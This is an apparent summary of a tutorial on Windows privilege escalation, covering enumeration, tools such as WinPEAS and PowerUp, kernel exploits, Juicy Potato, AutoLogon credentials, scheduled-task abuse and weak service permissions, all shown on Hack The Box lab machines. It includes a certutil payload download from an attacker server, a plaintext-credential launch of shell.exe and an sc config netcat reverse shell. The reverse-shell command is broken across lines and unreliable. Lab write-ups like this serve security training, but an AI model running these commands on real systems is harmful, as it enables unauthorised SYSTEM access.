8 Essential Windows Privilege‑Escalation Techniques Every Security Analyst Should Know

1. Manual Enumeration

Privilege escalation begins with gathering system information. Using systeminfo in PowerShell reveals OS version, patch level, BIOS, and processor details. wmic qfe lists installed updates, helping attackers spot missing patches that may be exploitable. User enumeration with whoami, whoami /priv, and whoami /groups shows the current account and its groups. net user lists all local accounts, and net user username displays detailed properties, including password policies and group memberships. Additional enumeration of network settings, antivirus, services, and processes can be performed manually.

2. Automated Tools

Automation speeds up discovery of privilege‑escalation vectors.

WinPEAS – a color‑coded script that highlights weak folder permissions, registry rights, misconfigured services, and scheduled tasks.

PowerUp – a PowerShell script that runs all checks with Invoke‑AllChecks or specific checks such as Get‑UnquotedService. It may require bypassing the execution policy.

Seatbelt – part of the GhostPack suite, written in C#, collects system and user data useful for identifying escalation paths.

SharpUp – a C# port of many PowerUp checks, allowing single‑check or full audits.

Windows Exploit Suggester – a Python tool that compares the system’s patch level against Microsoft’s vulnerability database to suggest missing patches that could be leveraged.

3. Kernel Exploits

Kernel vulnerabilities, such as MS10‑059 ("Chimichurri"), allow attackers to obtain SYSTEM privileges. The article demonstrates downloading the exploit from the SecWiki repository, serving it via a Python HTTP server, and executing it against a vulnerable target on the Hack The Box "Devel" machine. After establishing a reverse shell with Netcat, systeminfo output is saved and fed to Windows Exploit Suggester to identify applicable kernel exploits.

python3 -m http.server

certutil -urlcache -f http://10.10.14.10:8000/MS10-059.exe

4. Using Windows Subsystem for Linux (WSL)

When WSL runs as root, it can be leveraged to spawn a higher‑privileged shell. The guide locates bash.exe with where /R C:\Windows bash.exe, executes it from C:\Windows\System32, and then runs python3 -c 'import pty;pty.spawn("/bin/bash")' to obtain a full Linux shell. Linux enumeration commands and bash history reveal stored Windows credentials, which can be used with psexec to gain a SYSTEM shell.

5. Token Impersonation (Juicy Potato)

Token stealing attacks replace a low‑privilege token with a high‑privilege one. The article uses the Juicy Potato exploit (effective on Windows versions prior to Server 2019/10 1809) against the Hack The Box "Bounty" machine. After setting up a Python HTTP server, the exploit binary is downloaded via certutil, executed, and a reverse shell is obtained.

python3 -m http.server

6. Credential Harvesting (AutoLogon)

Windows can store AutoLogon credentials in the registry in plain text. Using WinPEAS on the Hack The Box "Chatterbox" machine reveals an AutoLogon password that works for the Administrator account. The password is then used to create a PSCredential object and launch shell.exe with elevated rights.

powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator',$password); Start-Process -FilePath 'shell.exe' -Credential $creds"

7. Scheduled‑Task Abuse

Scheduled tasks run with the privileges of the creating user, often SYSTEM. The article shows a task on the Hack The Box "Tally" machine that executes a PowerShell script ( SPBestWarmUp.ps1) hourly with -ExecutionPolicy Bypass. By modifying the script to download a reverse shell and waiting for the next run, an elevated shell is obtained.

8. Weak Service Permissions

Services running with high privileges can be abused if their ACLs allow modification. The guide demonstrates on the Hack The Box "Querier" machine how to replace the binary path of the UsoSvc service with a Netcat command ( nc.exe -e cmd.exe 10.10.14.15 4444) using sc config. After restarting the service, a SYSTEM shell is received.

sc config UsoSvc binpath= "C:\Reports
c.exe -e cmd.exe 10.10.14.15 4444"

Each method includes concrete commands, code snippets, and screenshots (preserved as

tags) to illustrate the exploitation steps. The guide emphasizes careful verification of permissions, patch levels, and service configurations before attempting escalation.